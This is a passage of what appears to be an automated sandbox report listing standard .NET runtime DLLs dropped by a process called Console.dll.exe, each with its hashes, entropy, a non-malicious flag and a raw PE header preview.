                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16560
                                                                                                                                                                                                                        Entropy (8bit):6.667065720555241
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:XmhPoXdDMWGCWiL5kHRN7oSDX+iR9zXQF:XmBoXdkBoSDuO9z2
                                                                                                                                                                                                                        MD5:D196C0F308DF74D02B298878ADB0226F
                                                                                                                                                                                                                        SHA1:82CE8A7D47CA6ECB4EA0352F58B3AA5805630B8C
                                                                                                                                                                                                                        SHA-256:B8C6687253A1755A3402CBFD44FCCC28C9A767B5B0EC7716034643BBF3B1993B
                                                                                                                                                                                                                        SHA-512:388316C585C6841E8EFE5297D056B232A133E50EE0C74F062A83B051649C0D3F116EFDB9A2A64FF18B4E33C46FCB28FDDC52D6DC5C2FA38292726B26248C5E08
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ............" ..0..............,... ...@....... ...............................C....`.................................a,..O....@...................(...`......t+..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~......h...#Strings............#US.........#GUID...$.......#Blob......................3......................................&.........W.............................j.Z...9.Z.....A.....Z.....Z.....Z.....Z.....Z...w.Z.....Z.....#...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):219312
                                                                                                                                                                                                                        Entropy (8bit):6.670657719101131
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CmvfVxEPYwqZEXWNCAAxgoCDsKRAxNXDeVYKk78:Dv/Eh9gzDs2A87
                                                                                                                                                                                                                        MD5:3699F56AEAD761E6481BCAE1805431C6
                                                                                                                                                                                                                        SHA1:929131BB609F39237303592953026F6E45DF34AA
                                                                                                                                                                                                                        SHA-256:ABF0EFB1BE5142C50BDE2F2B0678BF498D2CA1E6F7BC7BA76CFB9DA39ABEC5FC
                                                                                                                                                                                                                        SHA-512:0A9152CFA2DEC50BC5A3D54DC3C16F2D4D9BEF90735889013FDBBB1797D9F2656DB186746AE13BE730FCDA3D77F0C5078D553B30BBD63E5B33341E8894AD01C9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.E............!.........@....................@..........................0.......Y....@.................................................@C.......0...(..........x ..p...............................................................H............text............................... ..`.data...&........ ..................@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Tar.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):252064
                                                                                                                                                                                                                        Entropy (8bit):6.569058648343192
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:bgCXEFyHiKC9Jn92gzNYs5KuTNivmU7e/q/xv642ucULWH4b6Xbjr1m0f+HCUsOj:UH+iKpgzNYpuTNivmGeS/fGNfhUfSUMa
                                                                                                                                                                                                                        MD5:262E0D1530AE6272A874F9C02F34D904
                                                                                                                                                                                                                        SHA1:650B2CCBF577B709444570FDF504B418E8C9B107
                                                                                                                                                                                                                        SHA-256:1C58039A83AB1E44281ABE19145B825785C06B1CB72CDFCB6664F3C5CB80913F
                                                                                                                                                                                                                        SHA-512:6F0EFEF3D6C19903478CC10F80D7F60FBE501AF5755B1E4F11C92C2F2C50FC0A7D5A6D50BD0594B6404CC7A1DBDBD1067E59284CC312BA22D71AABB204C73B35
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8............!..... ...................0....@.......................................@.............................................p....J...........(.......!...$..p...........................................................p...H............text............ .................. ..`.data....A...0...P...0..............@....reloc...!.......0..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Calendars.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.754886262777028
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:/frRqXWDRqrRqm0Rq7WiKTb2HRN7FVSR9zdPaer8:XtqKqtqmuq6/iFVe9zBU
                                                                                                                                                                                                                        MD5:4859C1D539A46F9B53032B650B962FD5
                                                                                                                                                                                                                        SHA1:2CD648FF5D200E707FA264CA70D54541D0CBD4BA
                                                                                                                                                                                                                        SHA-256:7D71AE83B688DE5727228EEBBA5CE73CF429B2E3AA39078E27380951E895129C
                                                                                                                                                                                                                        SHA-512:D8E842D1F4EF226FAFB1861908267252691FC1A486B1589879ABFE80F96F0D0544342AE4B4DE348594C548FB6BDD9C734E24DD543273417C30E43A1F16F7B427
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qu............" ..0.............:+... ...@....... ..............................._....`..................................*..O....@...................)...`.......)..T............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ......................h)......................................BSJB............v4.0.30319......l...p...#~..........#Strings....|.......#US.........#GUID...........#Blob......................3..................................................;...x.;...3.(...[.....^.................I....._.................w.................G..................."....."....."...)."...1."...9."...A."...I."...Q."...Y."...a."...i."...q."...y.".......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                        Entropy (8bit):6.817828711348142
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:EMkRPWYRQRp0RjWi0Tb2HRN7/xkXC4deR9zZjmNPkX:EMeNipuM/i5kXC4dC9zZjyMX
                                                                                                                                                                                                                        MD5:16B075734BDF8928F4C69C18D1F27AB3
                                                                                                                                                                                                                        SHA1:57C34078BCEEBD4700039A47769BA3B7D85A9E61
                                                                                                                                                                                                                        SHA-256:66B0F94089CB16BCAAB1095742D703916CBCE3249787C40009E8B429108542B5
                                                                                                                                                                                                                        SHA-512:FF686B53C53773F08AF6F8FA20987AF29E54B37EC8F84E0BDC75F05EF741E8F84E942B9D5F4C358D6F5C6CEB77B4D18C63C1C4E147F9871E87BC1FE8F94F4C67
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F..........." ..0..............)... ...@....... ..............................q@....`.................................k)..O....@...................)...`......l(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..4.......#Strings............#US.........#GUID...........#Blob......................3..................................................8...x.8...3.%...X.....^.................I....._.................w.................G...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                        Entropy (8bit):6.685901902091984
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:5kARLWdRxRA0RHWiaTb2HRN7JkIn6R9zS9YKs:5kS0nAuW/iJkIn29zIYP
                                                                                                                                                                                                                        MD5:581CDE6AB67E43418D7CBFE80D72E65F
                                                                                                                                                                                                                        SHA1:D88A3C97D5F25A9904B231A2C116B82B995ADEAF
                                                                                                                                                                                                                        SHA-256:0CE9DEC5A34E7E3C7A9C41B629A4C9BC9F83AB46CA39206FCB376DCA09F3FA90
                                                                                                                                                                                                                        SHA-512:026D6DA2F95C3B37E4A52CAE3F488FF05A8F81A9DA5A6B8D58C068FC559F006473695B8C3E4F6FF381924D823ED884102A86BE4DF39BDEFB3EB85021C979DC39
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ..........." ..0.............v*... ...@....... ..............................s.....`.................................!*..O....@...................(...`......8)..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................U*......H.......P ..h....................(......................................BSJB............v4.0.30319......l...T...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................D...........o.....*...........Z.....p.....?.......................&.....X...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.Brotli.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):71840
                                                                                                                                                                                                                        Entropy (8bit):6.249705918397326
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:FyqrVTgeEACL3jAw9wbnR+ufpFQ80i+zn:FrxTgPAiZebnnBq7
                                                                                                                                                                                                                        MD5:0F85B86E5E5125CE93224431AE05C4C9
                                                                                                                                                                                                                        SHA1:8AA13B16BAAB32AF2989F003ACD45407FB68AF81
                                                                                                                                                                                                                        SHA-256:866443B3AB7B16B1DB84C70B8EE34D62A0743CFDE8B3EF8163C1C3A31140B333
                                                                                                                                                                                                                        SHA-512:636AD157B21DB3EB4F1832C1D00A991761CD7290911694DC43AE26975B59CB40FD2461313DBC42BE7D492E7541BDBE9C7CBED4FEABDFD2888707C32516A2C341
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`y............!......... ....................@.................................H.....@.................................................D!...........(..........$...p...............................................................H............text...$........................... ..`.data..._...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.FileSystem.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                        Entropy (8bit):6.734309154464376
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ItfdjgWYmWi6uWXebPpUNTQHnhWgN7aIW4f7KIjwX01k9z3ADZ7dqc/T:WfmWYmWi6Tb2HRN7UHR9zkZsUT
                                                                                                                                                                                                                        MD5:D584ADA25E0B31541024B2F2B94301D2
                                                                                                                                                                                                                        SHA1:9DF014CD389A42876DF9D4BF47C21E33002DF26F
                                                                                                                                                                                                                        SHA-256:B46FA511ACC943907BF4AC6625495F9BBA86FBACB1FF3CFFF300940BD13482B2
                                                                                                                                                                                                                        SHA-512:6031CAB3B6029DD5C079954230BF19C853FD933F83BDC9328D3D6FEB5AEA347AE5E28EE6E2EFBD6F43FD232EF4AE95798A71090F749A5C7DE8D1428404F4CCDA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............)... ...@....... ..............................._....`..................................(..O....@...................(...`.......'..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3..................................................U.....U...Q.B...u.....|.....7.*.....*...g.....}.*...L.*.....*.....*.....*...3.*...e.*.................<.....<.....<...).<...1.<...9.<...A.<...I.<...Q.<...Y.<...a.<...i.<...q.<...y.<.......C.....L.....k...#.t...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):51360
                                                                                                                                                                                                                        Entropy (8bit):5.827695627732539
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:wESfZWj7T/v98o0WjbUQSXr3sfyUZY+mf4e/i79z/3nS:wEcklX5jPS73s6nXiRz/3nS
                                                                                                                                                                                                                        MD5:B2CD40333649322D722742AF66FB27EF
                                                                                                                                                                                                                        SHA1:EA2D6C2E2B282A9FF9259BE2E648B28E77764641
                                                                                                                                                                                                                        SHA-256:48CE05CBCE86BDA7DC95D535C8A643B25FC68D69157BD8181131581A5494F455
                                                                                                                                                                                                                        SHA-512:1FE5AAB802C903536C83BA6E569438C570D014D10F1FDD226F2ECB19635F9760DEE796C81572D37C3060DEDA66E51312CA319C0FF1C67DB49030D8ABB1749A79
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.....p... ....................@.......................................@.................................................d............(......|.......p...............................................................H............text...4k.......p.................. ..`.data...............................@....reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):243872
                                                                                                                                                                                                                        Entropy (8bit):6.652726073351741
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:wIgDM0+MOTGTXnylE6VWWFqNfe5D9A/ciAaWF/sLr0C:wINTmX+52AJiAPFY0C
                                                                                                                                                                                                                        MD5:D993AA3815D528B36831E2DDEDDD5EBC
                                                                                                                                                                                                                        SHA1:A90D570120CA807A4E6C3208D696F478660B73B2
                                                                                                                                                                                                                        SHA-256:195151B0FCBB93013562216F48BCCA3627ED9A8309CE3C6D1F18DC3436D3034C
                                                                                                                                                                                                                        SHA-512:34A69455075AE70137E9F33D83818E2DC690217DB47199A024C70B0120C61182681F5D4F411C7F05D332876B3C1268B343F3670AC0DFA6CC99C7E8F8F5EA8B32
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I............!.....0...P...............@....@..................................V....@..................................................E...........(...p......@%..p...............................................................H............text....".......0.................. ..`.data....+...@...0...@..............@....reloc.......p... ...p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.AccessControl.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):96416
                                                                                                                                                                                                                        Entropy (8bit):6.173186741586711
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:gtnRMQfoANIfMmyEzfQHlgA+CAvpYOeKanvVk7RiBCzp:gEMopMZeq81antwMCd
                                                                                                                                                                                                                        MD5:0369FA11239A21884787A390FF957216
                                                                                                                                                                                                                        SHA1:1847033A1226CA01117837287BDFD0D759626109
                                                                                                                                                                                                                        SHA-256:8ED3B3842C81DC35EBB8C363896DC692772DEFFA908CDDCE5843D03EF75934DC
                                                                                                                                                                                                                        SHA-512:B89C1DA1391CD6CA0BBEA0B65257154E724D084026ACE401D101FBF5DC85CC16703905D46A4002F36FDAB4852322778F3C6D772816B89FB8925184FB1CD310DC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.........0............... ....@..........................P......u.....@..................................................$.......P...(...@..\...l...p...............................................................H............text...H........................... ..`.data...~.... ... ... ..............@....reloc..\....@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):51376
                                                                                                                                                                                                                        Entropy (8bit):5.612222212837681
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:BWuyWiVn4rVCHWl2Yd5zwNiVOnENxYx9JaFB61hRvxqsCUDeZSV6CZQP5xb4Rj1z:nr5f/VJImB61g1PCZQYJHsr9G9z60
                                                                                                                                                                                                                        MD5:59C0EA7BADAC5E06D2C5CCEC5E1AE485
                                                                                                                                                                                                                        SHA1:FC97F25E6132B8DC2A169C840CFACEA0079517D3
                                                                                                                                                                                                                        SHA-256:A08B26BC7688DA2B364617434D0996DC049F07C869461CC827745BE99C27AB07
                                                                                                                                                                                                                        SHA-512:A9A7AA3A489115B9E10A8720B3833EAEAE171FCCC357EA65D2A5D9C902578E7D93B594CC5DF1CA25DE9C73FA96428558DA7174F8F70C49D6A77F712A5717E6D2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._D.............!.....p... ....................@.................................w{....@.....................................................0........(..........P...p...............................................................H............text....h.......p.................. ..`.data...+...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.8059848977298785
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Iz1OYVxASasWRqWi6y3WT56Os1HnhWgN7aIWfjiCjVi6KrIX01k9z3A5Ug:U1TZasWRqWi6b5kHRN7V49R9zez
                                                                                                                                                                                                                        MD5:3EBE05196AA6314C31C7EC1691E3BAA4
                                                                                                                                                                                                                        SHA1:2CAD9121C8ADDEFF7C792F727F929BAE4D5F3DBC
                                                                                                                                                                                                                        SHA-256:F25DC801FDF5858A86059D065EE4D6FCF7F0A28A85F985A77201AEFC37968665
                                                                                                                                                                                                                        SHA-512:659658D0074277E676B6BD8B9758805340BB21C5F5A5E6D174D7CF68A60C06E80B1AE32C4D43B38FA8B3B1DBB2390BA381560A6BEE8D6AD8A57507293E1D1F28
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uy..........." ..0..............)... ...@....... ..............................>.....`.................................g)..O....@...................(...`......h(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID...........#Blob......................3................................................!.2.....2..._.....R...........E...........u...........Z.......................A.....s...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):75952
                                                                                                                                                                                                                        Entropy (8bit):6.27090922202494
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:9YoI2rQCEuJu0ZVH3qpEAyaFS2wiOKFz6I:9YIrbEOu0Z4pdG2TzWI
                                                                                                                                                                                                                        MD5:B53048F3A751B4B98C1718D52196DBD9
                                                                                                                                                                                                                        SHA1:774C178467A1D22E476E8554EC38184D83A493FE
                                                                                                                                                                                                                        SHA-256:63CF0BAEA79CA7FE11E331C7E64E6A0CE6589CA2EC535C010437687068A56080
                                                                                                                                                                                                                        SHA-512:AC875EA64D387028121E5BF7540DCDF9EC7657D06DB102AE658370750323367611BC2A2432C5230DAF7EFA1ECDAE06313BD885716828CD65F4CCE75FEC6E2B3F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7.............!......... ....................@.......................................@.................................................P!..0........(..........H...p...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.729698029980481
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:lWzRH8UxA8TCW4R2WiRMuWXebPpUNTQHnhWgN7acWyQyttuX01k9z3AWPoD9rpJa:gzRH7leWM2WiRMTb2HRN7FSR9zdParJa
                                                                                                                                                                                                                        MD5:CFA9A2CAFE226DE8FBCC7E195CE719AA
                                                                                                                                                                                                                        SHA1:CC1A1AC317F77235CDAEED53B0D63CFBB7892286
                                                                                                                                                                                                                        SHA-256:C6BF83633AF04D6676461B4F3769DE531A8000CAA89512CD5CD5D65829E89070
                                                                                                                                                                                                                        SHA-512:614643006A3CFC6CA759A0E765D2AC6190FB7002752C0818CB16786185936A387990F5662D388F38754D904D618BDFB0552827A93A6965E63FC01ACC8E58EBE1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............+... ...@....... ....................................`..................................*..O....@...................)...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................L)......................................BSJB............v4.0.30319......l.......#~......p...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3....................................../.........h...................................J.......a...............-.............................../...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):84136
                                                                                                                                                                                                                        Entropy (8bit):5.9452740347263955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:WebxCEhVl53SjZwEVE7+J5lex6AyRh4xN0TzU:WebxVVP3SjZwES+J5lexWRh4xNCI
                                                                                                                                                                                                                        MD5:B1D2C2EA5993B4BB866D060179632609
                                                                                                                                                                                                                        SHA1:6E30CD1BB972056C7A9126B399B65063AE9962D7
                                                                                                                                                                                                                        SHA-256:926BF8A982349ECBD3F54624F3385B78FCEFCECB370738867B8336A2261385F1
                                                                                                                                                                                                                        SHA-512:FEAED0E677806578E3B10E5DCC2F1739FF4E4DD8320A34D1C749564B614136A4C2C515C4F5FE562F01727D3A2203FE542B35532FB6BA6B0B6AFADC47E842C6EB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........0....................@.......................... .......0....@..................................................!....... ...(..............p...............................................................H............text...k........................... ..`.data............ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):75936
                                                                                                                                                                                                                        Entropy (8bit):6.033994356809488
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:t9hGIzEqrCUFq7Zb8GoZe/c2B92pVBiJbzk:t9h/EqrCUgb8Gp/1Ggbw
                                                                                                                                                                                                                        MD5:DA1B3729500FE79B811153FD38592BD8
                                                                                                                                                                                                                        SHA1:0C3703206864A6F691DF81184333BB706D3B5814
                                                                                                                                                                                                                        SHA-256:54A407D42F6EC68C72A92DC7E0858DADF7E1EF529082886ADC26A76741953F62
                                                                                                                                                                                                                        SHA-512:BCA0E4E45789D0B7E93D6B1EC827C1D33C9D6C4C0C152FDA70F7346AA0DD51CD7B2A1972ABAFE6A5BE662ECD98066CB24A7D9781BABB262C21B7691769A95193
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z'.............!......... ....................@.................................X.....@..............................................................(......`.......p...............................................................H............text............................... ..`.data...c...........................@....reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.AccessControl.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
